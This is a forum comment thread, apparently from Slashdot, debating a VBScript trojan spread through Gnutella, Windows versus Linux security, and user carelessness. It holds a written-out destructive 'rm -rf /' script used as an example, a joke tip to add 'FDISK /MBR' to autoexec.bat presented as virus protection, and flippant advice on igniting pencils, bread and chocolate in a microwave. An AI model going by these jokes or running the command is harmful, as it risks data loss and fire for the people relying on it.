So, for the time being, until I'm proven wrong, I'll shake my head and say "I'm glad I run Linux" when I hear about the VBS worm du jour...

Speaking from a lay-physics point of view, it's like the THEORY of Relativity...not the LAW of Relativity...It works, but nobody has proven yet that it will ALWAYS work...

Re:malicious no, a moron,..

[Cally]

Something I always wanted to do back when I worked in a Windows shop -- back up the standard IT dept warnings about not opening attachments by writing a simple program to mail us back saying "User x just opened an attachment." After a round of public humiliations everyone would be told that this would be a continuous policy, and would henceforth be a disciplinary offence.

Naturally the idea was a complete non-starter. The whole reason they used Outlook in the first place was so they could send each other pretty HTMLified mail with, like, colours ! and fonts ! and stiuff; plus they were always mailing 100Mb Excel and Access docs around to each other.
Camaron de la Isla 'When I sing with pleasure, my

Re:malicious no, a moron,..

[rifter]

That reminds me of the guy who said "I didn't pay $5000 to have to read a f*%#ing manual!" Believe it or not, we are going to have to eventually design idiot proof computers that fix themselves. This is the only way to cut down on support costs and truly get computers in the hands of the masses.

Of course such an animal is, so far, a fantasy.

Re:A point lost

[jjohn]

MS Office isn't truly to blame. The OS is responsible for file ACLs. Office would be fine (for some values of 'fine') on Linux. Have a scripting languaging to bind separate applications together is a good thing. That's the area python, perl and tcl fill in UNIXland now.

While I can't imagine a self-respecting X user with Mr. Clipit, I can see Mr. Hanky answering you MS Office help questions.

I run a Linux desktop at work. While I can use Star Office or AbiWord to open many MS Office files, I find now that I need to make a little UI with Access which uses ODBC to connect to MySQL. Now, I need a PeeCee. It would be nice to develop this app on Linux, then ship the file to my windows users. Oh well.

Re:Attention ZDNet readers

[Stone+Portman,+CGI]

I have developed a simple test to check your virus and computer IQ. You get enterred into a drawing for a $1000 bill, just for entering. To take the test, press Alt+F4, now.

I want to take the test, but nothing happens! Now, I am not some newbie dumbass, I have been reading ZDNN for 4 years, which makes me pretty much technically 31337.

I carefully follow the directions, and use four fingers to press the Alt, +, F4, and Shift (required for the +) keys and nothing happens. Plus I also tried using the keypad + without the Shift key.

Dumbass Linux geeks always pretend to be so smart, hahaha you fucked up this time.

So VIC20 GNU code would be Linux code????

[bbcat]

GNU != Linux
You could write GNU software that works only
on the Vic 20. It is not because you claim
in the comments that you are releasing the
code to the world that it becomes Linux code.

As for the vbs scripts in question get real,
it works only on winblows and even if you were
stupid enough to fix them to run on the
Linux basic you still couldn't do shit on
Linux for at least one of these four reasons

1-As a user you have little to no access
to dangerous area
2-You don't have a stupid registry à la winblows
3-Scripts can't run unless you set them
as executable
4-Basic is not installed on Linux unless you're
moron enough to find it and install it yourself.

Re:So VIC20 GNU code would be Linux code????

[Biff+Cool]

He wants you to call it GNU/Linux instead of Linux not instead of GNU.

Conscience is the inner voice which warns us that someone may be looking.

Re:So VIC20 GNU code would be Linux code????

[bbcat]

>Yet another indicator that there is no friggin'
>difference between the two.

Your conclusions are very much like the
following one.

L'homme descend de l'arbre
Le singe descend de l'arbre
Donc l'homme descend du singe.

Re:When will this run on linux

[extrasolar]

Compatability with Excel spreadsheets is the main reason, I heard.

Do you use spreadsheets alot?

Re:Huh?

[rifter]

What culpability? this is a VBS file. It just happens to be distributed on gnutella, but it would only work for Windows, and is only harmful because of Microsoft Closed Source == Closed Mind security, or lack thereof.

Linux is not even involved here.

Re:...but remember, Gnutella isn't actually weak..

[Mr.+Slippery]

Also, how would I go about checking a binary file I downloaded to make sure it's what I think it is and not an insidious worm?

There are a few possibilities:

• Download only from trusted sources. Hard to do with Gnutella, but practical with FTP or HTTP. Yes, the source could be compromised, but such a compromise would be quickly found and stopped. Don't trust your life that a download from, say, redhat.com is what it purports to be, but for most people the risk is minimal.
• Download only files cryptographically signed by a trusted party. You've still got the problem of "who do I trust, and what if they are fooled?" but it's much more difficult to forge a cryptographic signature than to crack a server and put up a mailicious binary, and this can be used with anonymous-source downloads (i.e., Gnutella).
• Download only source, and check it over yourself. That will only protect you against attacks you are knowledgable enough to find, and would get tedious real quick.
• Run the binary in a sandbox or jail, where what it can do is limited. But that also means that the usefullness of the program is limited.

Here goes my Karma, But....

[DgtlGhost]

How the Hell is this insiteful? "Open Source it!" is not really a brilliant statment! It won't solve the Windows inter-reliablity problem that caused this issue! Now, open sourcing Windows, or IE or OutLook might allow people to turn those into more funtional programs, but but it won't change Gnutella any. Gnutella is plenty secure, and it's actualy kinda funny to me that after all the warnings about opening VBS from Email, people are purposely downloading them now from Gnutella...
lUsers....

-Earthman

Re:my favorite is the html generating scripts

[AugstWest]

I think it's because the Beatles were already the second coming, NKOTB was the third, and the Maurice Star boy groups (the Bel Biv D'Jours) kind muck up the numbers from there.

Maybe we need, like, a Sony Music Corp Voice of a Generation, and a Warner Brothers Voice of a Generation, a Geffen Voice of a Generation and so on. That way it'd be easier to keep things straight.

uh-duh

[nimmo]

Correct me if I'm wrong, but this virus is a VBS file. It can't do any damage - in fact, it does no damage as it is - only if you open the file and execute the script. So, what's the big deal?

Gnutella users: continue, ignore this hype, and just make sure you know what you're doing before you open a file.

Re:...but remember, Gnutella isn't actually weak..

[TheZork]

Yeah, but on a multi-user OS like Linux, it's tougher for a stupid user (on a properly configured system) to hose the OS or other users' stuff. Windows makes it really tough for the lame among us to protect ourselves from... us.

anonymous file swapping--no good for executables

[jetson123]

Gnutella doesn't have much in the way of authentication or signatures for the files people download. That isn't a problem for MP3's--if you thought you downloaded Metallica and you get Pocahontas instead, nothing has been damaged. But for executables and some kinds of documents, it's a big problem.

Re:Same vien as ILOVEYOU

[earache]

Umm no.

Attention ZDNet readers

[jabber]

I have developed a simple test to check your virus and computer IQ. You get enterred into a drawing for a $1000 bill, just for entering.

To take the test, press Alt+F4, now.

Re:malicious no, a moron,..

[quonsar]

The whole reason they used Outlook in the first place was so they could send each other pretty HTMLified mail with, like, colours ! and fonts ! and stuff...

And that, folks, is the sum total of Windows contribution to 'productivity'. Plain text business documents would suffice in damn near any situation, but PHB's have gotten hooked on those 'pretty' Word and Excel docs and everyone down the line wants to please them. I have repeatedly observed that much more time is spent over formatting than conveying content, even down to the lowliest aide typing a memo. Powerpoint is an excellent example of this. Its ludicrous.

======
"Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

here's a hint

[/]

open mouth

remove foot

insert sense of humor

chew and swallow

Re:CODE...

[camadas]

You got to love these open source worms/virus, whatever. Will it be GPLed ?

Re:...but remember, Gnutella isn't actually weak..

[zeck]

Be smart, don't run anything from an untrusted source without checking it first.

Isn't all of Gnutella pretty much an untrusted source?

Also, how would I go about checking a binary file I downloaded to make sure it's what I think it is and not an insidious worm? Size could be a clue sometimes, but not all the time, especially if the programmer is smart and names it to look like appropriately sized binaries. Would virus protection software catch something like this?

Re:Virus hackers becoming Microsoft'ed?

[jbarnett]

I remeber when the CIH virus came out, I thought to myself "Dam that is pretty cool". I am not malice and I am sorry for the people that had their bios flashed cause of this, but you got to admit, that is atleast (if nothing else) an intresting payload, compared to say "format C: /q"

Re:...but remember, Gnutella isn't actually weak..

[Chandon+Seldon]

Windows doesn't differentiate between "view" and "execute". It uses the same command (double click) for both. Double clicking a .vbs file executes it, while double clicking a .txt file opens it in a viewer. Combined with the default Windows setting of "don't show extentions" this is a OS error if I ever heard one.

On the other hand, this is another example of user stupidity. People have to be told that "You just don't run stuff from an untrusted source."

The problem is, with Windows, that becomes "You just don't open stuff from an untrusted source."

Hmm... I think this *is* an OS and application error. (Operating System for lack of View/Execute distinction, Applications such as MS Office for allowing data files to do system calls.)

Re:clearing things up

[Nick_Psyko]

GNUtella ? what does it mean? well it depends on how you express it... could be GNU teller like evryone else is saying but I think that it has nothing to do with GNU or Magic (Penn+Teller), I prefer the reasoning that someone could not think up a name and so looked in there 3:00am munchies cupboard and saw Nuttella, Great,, Nuttella. then whilst in the programming daze that so often envelopes such coders the thought of great nuttella lost a few letters and became Gnutella... Sorry for the post that was not about any sort of virus/worm etc but I just thought that I had to splurge that rambeling drivel all over /. :O)

Where to get Gnutella

[goingware]

You can download Gnutella for a variety of platforms from the Gnutella home page.

Some come with source. My favorite so far is gtk_gnutella that I run on Linux.

The one problem I notice with Gnutella is that if I leave it running for a while - even idle - I will eventually need to reboot my cable modem.

You will need an initial host to begin connecting to GnutellaNet. One is always show on the Gnutella home page.

Boot Sector Virus Protection

For added protection from boot sector viruses on your Windows machine add the following line to your autoexec.bat file:

FDISK /MBR

This will automatically eliminate certain known boot sector viruses on your machine. Said viruses have the effect of transform your machine into a 1980's-era time sharing system.

Anyone that downloads a vbs file on gnutella...

[Syllepsis]

Good god...anyone who is so absurdly stupid to download a vbs file on gnutella and then actually runs the thing without looking at it deserves whatever they get.

Distributed file sharing is NOT good for trading executable code. No one should ever just download some script from some unknown host and then just run it without examining what it does.

This is simply the digital equivalent of taking candy from strangers. Society needs to wake up to the handling of code downloaded from the net. If someone comes up to you on the street and offers you a swig of some green liquid, do you take it? I hope not.

This 'worm' is not a weakness in gnutella, windows, or any program whatsoever. This is just proof positive that people will run whatever crap comes to their machine without batting an eye.

Now I am going OT: This is an issue of security education. One day, people will learn that computers are simply (and this is from a theoretical standpoint) hard to learn. Everyone wants a little text box that you can tell the computer exactly what to do and it will do it like that. We have had this technology for a long time. It is called bash. It works very well and is easy to use. However, one does not learn it in a few minutes.

People who take the time and effort to learn how to properly use computers understand the raw power available in a few lines of code. They are very careful about naughty little scripts that go around the network. The other people dont know how to use computers, and should have devices that do not run executable code of any sort other than the five or so apps that they dont do anything stupid like get code from some random machine.

Re:Anyone that downloads a vbs file on gnutella...

[Graymalkin]

What makes you think you're so superior a computer user? Ohhh, wow you can type things on a command line. That is really excellent, you ought to be commended. Oh wait a second, The command line is an interface to give the system instructions, not to actually process data. Raw power in a few lines of code, you would be hard pressed to do anything worthwhile merely from a command line. Moving files and writing the output of ls to a text file isn't my idea of raw power. Under your logic cars ought not have power steering or ABS brakes because people ought to learn how to live without them. Everyone ought to spend their time at home in fromt of a glowing screen like you do so they too can understand computers. Doesn't it suck to be a 45 year old virgin though?

Re:clearing things up

[Nick_Psyko]

sorry for the not reading the threads disease, I just posted the same thing just below you!!!

ARRRRGGGGHHHH Must absorb more of the page.....

Re:...but remember, Gnutella isn't actually weak..

[zeck]

But there are so many ways of getting around virus protection software... No matter how current you keep your virus definitions, they're not going to detect a clever virus written yesterday. Sure, a patch will be out to detect it pretty quick, but by that time it might not matter.

Re:malicious no, a moron,..

[/]

People are capable of thinking but they have bought into the Apple and Microsoft hype that computers don't require thought so they refuse to think.

And in response to this precise problem, Apple has for many months now been running public service announcements with the catchy slogan of "Think Different".

Re:...but remember, Gnutella isn't actually weak..

[zeck]

Easy to say, but given the nature of a piracy service like Gnutella it might not be so practical.

Re:clearing things up

[TheMeld]

setting privs on a script to 4755 will do jack. In linux, the setuid bit on scripts is ignored. If you want to run a script setuid, you have to have a special, setuid interpreter. This is how perl does this, via suidperl.
-Matt

More Earthquakes?

[Speare]

I think news stories about attacks are like news stories about any calamity. Earthquakes, terrorist activity, draughts, illegal-alien smugglings, LAPD scandals, whatever.

There isn't really a larger number of tornados per year, looking at the big picture. There are more people, settling in more areas, so more people reporting heretofore-unseen tornados.

If a couple stories are on the same topic in a short time, a news service will develop a "focus" on such stories, and will pick those out from the newsfeeds like Associated Press.

When it comes to people-induced tragedy, the news stories generate a lot of copy-cats. Columbine, Melissa, Oklahoma City, the list goes on.

The fact that the news services sensationalize the stories, with big numbers ($5 billion cost, blah blah), it's worse. Those big numbers are what businesses are putting in their claims forms for insurance claims against lost business, whether they really lost that much business or not.

boobytrap

[Skeezix]

they should call it something new. call it a boobytrap -- that's what it really is anyway.

I like that. Boobytrap it is.
----

Self defeating policy

[|DaBuzz|]

They say don't download/run anything from a source you don't trust ... the question is, why develop a client to interact on a GLOBAL, utterly anonymous peer to peer file sharing network if you can only download stuff from people you KNOW and TRUST?

It's kinda like saying ... "use this product to get access to files you never would have dreamed of, but don't ever download or run anything you can't get from a local friend."

Kinda defeats the purpose doesn't it? Rather, it illustrates the inherent weakness in this whole system and how people's desire to steal software overrides their common sense of not dealing with anonymous users you can't trust.

If someone on the street offered you an opened Coca-cola, who would be stupid enough to drink it? Change the Coca-Cola to Mad Dog 20-20 and almost any alcoholic would drink it showing that common sense is often thrown out the window to get what we think we want/need but what in a lot of cases is not good for us puts us (and in this case, our computers) at serious risk of harm.

Re:Self defeating policy

[god_of_the_machine]

I think they are referring to executable files in this case. At worst, a MP3 or JPG or MOV will offend you... we all know the worst that a VBS can do.

That's why you should use the "GLOBAL, utterly anonymous peer to peer file sharing network" to do what it was supposed to do (pirate music, video, etc)... not pick up .VBS files!

-rt-

Re:Virus hackers becoming Microsoft'ed?

[camadas]

Remember the ones that used to corrupt the FAT table? Now THOSE were VIRUSES.
I collect virus since the dos 3.3 days. I recall that most of the virus that corrupted FAT were te bad written ones or the bad modified rewrites.
And of course the infamous DoubleSpace from DOS 6. THAT was great in the loss of data.

Re:Gnutella security not related to closed source.

[BigBlockMopar]

Until gnutella opens its source, it will never be secure. They might be able to fake it, and claim security, but backdoors like this will always exist until there is a large team of dedicated users who can fix bugs and patch code.

Nah, you're missing the point.

First off, forgive my ignorance here, but I had thought that Gnutella was open source?

Regardless, the true power of Gnutella is based on two factors. First and most important being the lack of a centralized server system for the RIAA/MPAA/etc to shutdown.

But secondly, since it's not restricted to any file type, security of the executeables downloaded is a user issue. Do you want Gnutella to ban VBS files? That would just hurt people wanting to transfer legitimate VBS scripts.

In fact, Napster could be used to transfer this stuff. Just Wrapsterize it, give it an interesting title, and away it goes.

How about banning executeables?

Again, that just hobbles the usefulness of the system and limits the user base.

Unlike the constant Outlook fiascos, the only way to transfer this worm is to actually decide to download it from another user and then execute it, versus the Outlook model where it just appears in a user's mailbox. If you practise safe surfing, it's not an issue.

Vx definitions revisited - its a Trorm

[onepoint-o]

The angry assertions by slashdot readers that this is "not a worm!" are a little unfair. A statement such as "well, its not really a worm" might be a little more appropriate. It's more of a trojan with worm-like properties. This is a brand new animal, I believe. Doesn't a trojan that replicates- even if the mechanism of replication happens to require human assistance- deserve a name of its own? A worming trojan? A trorm? No one would deny that it doesn't implement the replication thing the same as your historical worms, but there's not really a classification for this type of animal yet. It all seems very wormy to me.

Fun with the nuker

[BlueUnderwear]

Ummm... metal in a microwave,

... normally doesn't harm the microwaver. If shaped correctly, it may generate some sparks, but that's it. You can actually get some pretty effect by putting a CD in (please use a Windows CD for this, it won't play after this stunt).

microwave started with nothing inside it

Although using the nuker "empty" is not very good for it, it won't damage it either just from one time.

drying paper towls in the microwave which then catch a light when you take them out

Yes, the nuker is indeed a great tool when you run out of matches. Other ways include: pencils (pretty quick), bread (leave it in for a couple of minutes), chocolate (black chocolate works best: wait til it melted, then leave it for one more minute). Pencil mines are interesting too, but you need something disposable to prop them up against.

And the classic: eggs (no fire, but count a quarter of an hour's work to clean away the mess), soap (use a very small quantity, unless you have a really large nuker).

Re:GNUtella only runs on *BSD, not Linux

[Biff+Cool]

It wouldn't even need to be in a sandbox all the time. Just cripple it by default. You know it's not that Windows can't be made secure it's just that it takes so much fucking longer to find all of the goddamn checkboxes that they hide to disable all of the default security holes, that you may as well just learn *NIX to begin with.

Sorry it's Monday, and I hate VBScript

Conscience is the inner voice which warns us that someone may be looking.

Really Clever?? Are you kidding?

[jabber]

Here, take this dirty syringe, full of unidentified liquid, and inject yourself with it... Done? I just infected you with a virus! Hahahaha!

How is it 'really clever' to prey on the ignorance - and stupidity at this point - of people?

The only thing that sets this trojan apart from those of 'days long gone' is the speed with which it can spread, and the trojan does nothing about that. It's the network, and the fact that it is populated by less and less technologically versed users, that makes this (and things like this) a threat.

Let's thank the gods that the dangerous biological viruses, like Ebola, Magdeburg and a host of others, are relatively confined to the extremes of civilized society. If they were placed in the human anaolg of the Internet (Times Square on New Years Eve, or O'Hare Airport on a major holiday weekend, for example) we'd be done by now.

Let's be thankful that all our virtual Times Square has to deal with is some dirty needles, and clueless newbies who insist on sticking themselves in the arse with them.

Re:Gnutella is closed source, hence not secure

[rifter]

The reason it is important to make VB secure is precisely caused by the fact you do not have to double-click on a file to start it. VBScript can be embedded in html email abd other html sources, and Office docs. Corel is going to put it into wordperfect. So you open a file that says "resume.doc" and get infected. Or click on a link, or preview a message in Outlook. And then you are infected.

If VBscript had a sane security model this would not be a problem. Bottom line, nothing that gets run automatically should have file access beyond a specified order.

Re:hrm

[evand]

Why, again is it stupid? I know it is stupid but, why?

One reason is that running as a normal user is somewhat more of a "sandbox." If I give you a file called "freeporn.sh" containing

#!/bin/sh
rm -rf /

and you ran it as root, you'd delete pretty much everything on your system. Run as a user, it would only delete stuff that the user has permission to delete.
Also makes you think a little bit more when you're about to do something. If you're su'ing into root to delete a directory, you're probably going to be paying more attention and may not just fire off an "rm -rf / home/jimmy." That's never a good thing to do ;)

Re:This is proof that Linux is not immune

[EnVisiCrypt]

Hey man, gnutella doesn't = linux. Also, .vbs files work exclusively on winblows. Even then you have to be a dumb ass and have scripting enabled. Fact checking. look into it.

Re:Reminds me of this UNIX "virus" I recieved once

[thomasj]

The worst is that I got one, that drew money from my account. It contained a fill-out-the-blanks credit card payment slip. The e-mail instructed me to fill it out and return it, or my harddisk would be gone! I was so scared, that I didn't dare to ignore it, and now they draw $120 bucks a month on my mastercard. And there is nothing I can do about it.

23 eh?

[isolation]

I guess Robert A. Wilson was right. I cant get away from it.

gnutella is for windows.

[Yarn]

and is not open source. There are some open source clones, and I suspect these will not be affected.

so nyah!

TrollMark: 3/10

Re:gnutella is for windows.

[Biff+Cool]

Actually they would be just as affected, it's just a file that shows up. You have to download it then run it yourself (Just like ILOVEYOU). Open Source can only go so far to protect people from their own stupidity.

Conscience is the inner voice which warns us that someone may be looking.

Re:malicious no, a moron,..

[geekoid]

Next time have it pull information off there system and display it. Really good if they have a 'money manager' like application.
I seeing there credit card number flashing befor them doesn't stop them, nothing will.

Re:...but remember, Gnutella isn't actually weak..

[hamjudo]

Also, how would I go about checking a binary file

Verify the MD5 checksum with the author or with someone who has checked the binary.

Re:hrm

[extrasolar]

Umm. I can do the same thing in netscape and ncftp.

"...and you ran it as root, you'd delete pretty much everything on your system."

Why would I do a stupid thing like that? Give me *some* credit, will you?

I just thought there was something special about IRC clients, like maybe letting many people on IRC know my IP address when I run as root or something.

Re: VBA "virus builder's assistant"

[kevin805]

Back when I read alt.comp.virus regularly, it was understood that VBA stood for virus builder's assistant.

People keep accusing Microsoft of making low quality products, but VBA was a major improvement from NuKe's Virus Creation Labs.

Re:Virus to set security settings to paranoid?

[jbarnett]

If someone does make one, I vote for the name "IHATEYOU". Just remove "Windows scripting host" and assocaite the .vbs extension with lets say notepad.exe...

But then again, you are still accessing someone computer and chaning someone else data without their premission. Which even if you heart is in the right place, still might get you in trouble with someone.

Plus what would happen if you script had a bug in it? Also should companies be allowed to "worm hole" hot-fixes into your computer without your premission? When the new service pack 6 screwed up some Lotus mail program, do you think IT managers would be happy that Microsoft automatically "fixed them" without premission?

Re:More interesting...

[wtpooh]

I actually came across an example of this just now. I was searching for some live recordings from a San Francisco radio station called KFOG, and found a file called " kfog.html" (yes, with the space out front). If you open it, it redirects you to a web page, which then sends you to a porn site (well, it would have sent me to a porn site except that the person mistyped their own IP address in the file :) ).

Re:...but remember, Gnutella isn't actually weak..

[sandler]

In unix, you'd do "file foo". If it says "MP3," that's good. If it says "ASCII virus text," that's bad.

Is there some equivalent in Windows, or does everything go by file extension?

Re:GNUtella only runs on *BSD, not Linux

[C.Lee]

>err...the Linux port hasn't been finished yet. BSD, on the other hand,
>*does* have a port, and it *does* have security issues, especially

Wrong. BSD's are no more affected by VBS scripts than Linux is. Also there are a number of Gnutella clones already out that are better than Gnutella. I don't use Gnutella at all, but rather gnut, a cli version of Gnutella.

Re:Name a file "Metallica"

[BlueUnderwear]

Yeah, a great way to get back at them sharkz: lay out boobytrapped Metallica filez: they'll catch the flu, and hopefully learn the lesson that it's better to leave us geeks alone.

Re:Gnutella is closed source, hence not secure

[C.Lee]

>You can download the source for several of the clones right now. FURI
>is probably the best client out there right now, and it's written in
>java and can be run pretty much anywhere.

Crap. Gnut is actually better because it's written in C and thus is better because you don't need JAVA to run it. Get a clue.

Re:Virus hackers becoming Microsoft'ed?

[Godfree^]

When was the last time you used a floppy disk, let alone left one in the drive at boot up (if you reboot)?

"Legacy" virus' are out of date. The replication systems used wouldn't be as efficient in todays connection world. Maybe a file virus could work, but, that would involve sending other people your executables, and that doesn't happen much.

Virus' authors are like marketing people. They aim their products at the masses. And today, the masses use the 'Net for distribution.

malicious no, a moron,..

[ebbv]

yes. this is just stupid. it's a security hole only in the user's knowledge. any even remotely intelligent person would know what a .vbs file is, etc. etc. etc.

the moron doesn't deserve kudos, he deserve a swift kick in the pants for being a dork. this is a childish thing to do, it serves no purpose, despite your silly claims.
...dave

Re:malicious no, a moron,..

[Ambassador+Kosh]

That is a slogan it is not teaching users to think Most of the ads I see for imacs portray them as being idiot proof boxes. I had a user call up after she bought an ibook. She knew nothing about macs but bought the computer because it matched her dress! She didn't want to read any instructions. She saw the ads and they said the computer was idiot proof. That is also what they told her in the store.

She didn't want to think. She told me she did not want to think. She just wanted her problem fixed which she caused and didn't want to be told how not to do it again. She told me it if my job to fix it everytime she breaks it. Of course that is wrong but that is a seperate issue.

Re:malicious no, a moron,..

[Frodo]

Thats' one more proof - you can not educate your users. If you could, world be so nice place, but you can't. You should make tools that protect them from themselves, just like you hide dangerous liquids and matches from kids. If you use wrong tools or let them do, you accept your doom. Instead of sending next virus-alike to your grands, send letter to their mail client maker and ask them to remove "double-click" thing. Do this repeatedly until they get a clue or use other product.

Re:malicious no, a moron,..

[Robert+S+Gormley]

Metal is perfectly okay in most commercial microwaves. Not even a spark. Design feature.

I was going to be a pedant and say that water didn't explode, but sense got the better of me and I found a definition of explode saying 'to burst forth with sudden violence or noise from internal energy.

Re:malicious no, a moron,..

[Ambassador+Kosh]

You forget on windows by default it hides known file extensions. So the file is no something.vbs it is just something.

The other problem is you, I and many others may know vbs files are dangerous but most regular users do not. Even after all the information with the ILOVEYOU problem people still clicked on vbs files at the university here no matter how many times they were told not to. That is why we now mangle file names of executable content when they are received here. That makes the person renamed the file to execute it and to get that info they have to read the instructions. These steps have radically cut down on the problems we have with this type of content.

Look around you. You can't realy on human intelligence because most people choose not to think. Most computer problems are very simple but users don't want to think. I have had to explain to the same person 20 times that when the comptuer says "Press enter to continue" that means press the enter button. That is not a hard concept but it requires at least reading skills and this person was working on her PhD in some humanities field. People are capable of thinking but they have bought into the Apple and Microsoft hype that computers don't require thought so they refuse to think.

Re:malicious no, a moron,..

[jbarnett]

I just tested this, I emailed my grandparents and told them to NEVER execute an attachment. I told them it was probably a worm or virus, when into the whole anti-virus/windows progranda and told them not to even click one executables for people they know and exchange email with regular and even trust. They understood it pretty well.

I wrote a quick, "Hello World" command line program in C, emailed it to them, and guess what, they ran it. I just told them 5 minutes ago that it would probably be a virus, did they question it? No, they ran it blindly.

It just printed the string "some one just told you not to double click on executables, if I virus or worm, you would have to restore from backup, do you even have a backup. Glad I like your mug"

They emailed me back saying "opps". I think they better understand now, the real test is when I email them here in a couple weeks and see if they remember then.

They aren't computer savy, they chat with old army buddies via email and view cooking guides on the web, they are "normal users" and don't really have a concept of virii or malice users, even when it is clearly explained to them. Sure they understand it, but do they practice it?

I am going to wait a couple weeks then email the same program from an unknown (atleast to them) hotmail or yahoo email account and see if it "stuck" with them

Re:malicious no, a moron,..

[pallex]

Its simply not possible to press just one single button on a vcr, microwave, radio, games console, mobile phone etc and screw up everything to the point of having to spend 3 hours undoing it (or having to take it back to the shop). Is the fact that you can make this happen on a pc a fault in the user, or the pc?
Perhaps there should be a `user` mode of some sort that just *doesnt* let you f**k things up, no matter how inconvenient.
Perhaps ignorance isnt bliss, anymore?

a.

GNUtella only runs on *BSD, not Linux

err...the Linux port hasn't been finished yet. BSD, on the other hand, *does* have a port, and it *does* have security issues, especially with VBS files being run automatically (!)

I think the problem with porting is the glitches in BSD's POSIX-compliance libraries which had to be worked around in the code. Now that they're getting it to work with Linux, they have to re-write to be compatible with the real POSIX standard (ie, Linux kernel services), rather than the broken BSD implementation.

Re:GNUtella only runs on *BSD, not Linux

[JEDi_ERiAN]

gtk_gnutella is a working port of gnutella for linux. search for it on freshmeat.



-

Re:GNUtella only runs on *BSD, not Linux

[.pentai.]

How does the BSD port run a microsoft Visual Basic file - or better yet, WHY? Perhaps you were referencing the windows version as being buggy with VBS...but last I checked VB wasn't ported to *BSD.

Re:GNUtella only runs on *BSD, not Linux

[Biff+Cool]

So it automatically runs scripts if you download them? That's one of the worst ideas I can think of.

Conscience is the inner voice which warns us that someone may be looking.

Re:GNUtella only runs on *BSD, not Linux

[Andy+Dodd]

If you read the Evolution thread, they're adding VBS capability, but unlike Windows, they're keeping it in a sandbox with restrictions.

Re:GNUtella only runs on *BSD, not Linux

[SirGeek]

I talked with Theo DeRaadt about this on the BSDCON mailing list a few months ago, and he essentially told me to go to hell when I suggested that this "feature" be disabled. Apparently the *BSD folks think that point-and-drool convenience takes precedence over security, even when very little convenience is achieved.

Theo DeRaadt != BSD.. He is OpenBSD and he tends to be a bit on the rude side. I would send an email to the physical developers of the proggy (and to the development list) and explain your concerns and make your suggestion.

Now that they're getting it to work with Linux, they have to re-write to be compatible with the real POSIX standard ..

This isn't ONLY a BSD to Linux problem. It can be a Linux to ANYTHING problem too. I have had more nightmares converting stuff that uses /proc "files" instead of system commands (or by using some sort of wrapper around the system calls and /proc to make it portable)

Re:VBS file extensions

[rifter]

Problem is windows hides that extension by default.

Linux enters the mainstream?

[GrayMouser_the_MCSE]

Well, finally a publically known virus that can attack linux users. Of course, this virus isn't automatically given root access to the system. Oh, and this virus can't automatically replicate itself to hundreds of your friends. Hmmm... this virus can't even go into your system and change files that you don't have rights to. I guess Linux still has a long way to go before it catches up to Microsoft.

Re:Linux enters the mainstream?

Huh? This virus can't attack linux users. It is a vb script file, and can only be executed on a windows box.

Re:Linux enters the mainstream?

[GrayMouser_the_MCSE]

I'm sorry for the lack of technical accuracy in the post. I was trying to add a dose of humor to my (and hopefully your) perhaps otherwise dull day.

Re:Linux enters the mainstream?

[Bazman]

Hehe. Of course you could always rewrite this vbs file as a shell script. The trick is getting people to run it. With Windows its there in the folder, looks executable, you double click it. Bang bang bye bye hard disk.

But with the increasing use of desktop file managers like that with Gnome and KDE, you could run a shell script virus downloaded from Gnutella just as easily. All it would take is for your umask, or your application, to be set to add execute permissions to files.

Could even be a trojan, a gzexe-compressed shell script that seemingly does something else. Be vigilant - linux viruses/worms are coming!

Baz

Re:Linux enters the mainstream?

[Legolas-Greenleaf]

This has got to be one of the longest flame threads I have ever seen. People really should understand what's going on before posting such emotion causing statements (especially something antiLinux on /. without due cause) ;^)

If somebody could point me somewheres where i can actually find out some information about VBS and what it's good for (since, of course, all i've been hearing about is all these trojans), it could be most useful. As of now, I haven't seen any possible use for any mirosoft program (but expecially Outlook) to have this functionality, or even auto-view it. (in some cases)
-legolas

i've looked at love from both sides now. from win and lose, and still somehow...

Re:clearing things up

[jbarnett]

I know this, that is why I said for the runtime interputer, ok so it is spelled wrong, but you should still be able get the point of the post with a couple characters misplaced.

Re:clearing things up

[iCEBaLM]

which I am not claiming it is right, but when I first heard GNUtella, I thought it was a Unix program from the Free Software Foundations...

What does the "tella" stand for anyways?

Nutella is a chocolate spread that comes in a jar, akin to peanut butter. Its quite rich chocolate, very sweet.

GNU + Nutella = GNUtella

-- iCEBaLM

Re:VBScript isn't evil

[Jason+Levine]

I've used VBScript to automate a lot of tasks that would have been very repetitive to do otherwise. What MS needs to do, however, is beef up the security on the Windows Scripting Host (which VBS files run through) so virus-like behavior gets flagged and the user is warned. (Of course, not one to wait for MS to act, I wrote a prog that'll do this... http://www.winmag.com/fixes/watchdog/ if anyone's interested.) Once a buffer is in place, the rate at which VBS-type virus' can spread will diminish a lot. For example, many users might open a PAMELA ANDERSON.MOV.vbs file, ignoring the vbs extension and getting infected. But how many will proceed if opening the "movie" file returns a warning that this will change your registry, overwrite files, etc.

Re:Gnutella is closed source, hence not secure

[mgt]

Hehe isn't that just lovely... but in these cases with the gnutella issue and the loveletter virus i hasn't been activated automaticaly. You had to open the email and then doubleclick the attachment. And with the gnutella version you had to download it somewhere on your disk and thewn try to execute it. Hmm if i write a VBS and put it on a web-page and call it funny.txt.vbs and people download it (hehe why read it it netscape =) ) doesnt that make it a WEB-WORM ? ... oh my god the whole WWW is going to be infected...

Not a worm!

[Signal+11]

A worm propagates automatically without user intervention - like the Great Internet Worm.. or, more recently, remote explorer. This is a trojan horse. Get your definitions right, ZDNet.

Second, be very grateful the author was nice enough to make this a benign bug.. it could have had CIH as its payload.

Re:Not a worm!

[kaphka]

This is flamebait, I know, but it has to be said: I find it interesting (and dissappointing) that everyone here is so anxious to point out that this is not a worm (which is correct), yet most people had no problem with calling the ILOVEYOU trojan a worm, even though it used the exact same mechanism to propagate. (I.e. convincing stupid users to run it.)

Fortunately, open source gnutella can adapt.

[Jason+H.+Smith]

You make a good point; however, Gnutella's open nature will be a positive factor. For instance, I can think of a few ways to help to combat this problem off the top of my head. Soon, I believe, Gnutella will offer the freedom to effortlessly exchange any file, and the smarts to evade spamm.

-pedantic

[Imperator]

If I were a naughty boy, I would use scripting to get name, email, or whatever file I want.

Re:-pedantic

[talks_to_birds]

Whoa!

Grammar!

What a concept!

t_t_b
--

Some details about the worm.

[pen]

Before you go screaming and shouting, here are some facts I found after analyzing the script:

• The "worm" only works if Gnutella is installed in the default directory, "C:\Program Files\Gnutella\". Since Gnutella doesn't use the registry or any other system-wide config files, it is fairly hard to pin down where it is installed. (One way, of course, would be to look at the Start Menu shortcuts, but those are optional as well. Maybe in version 1.2. <g>)
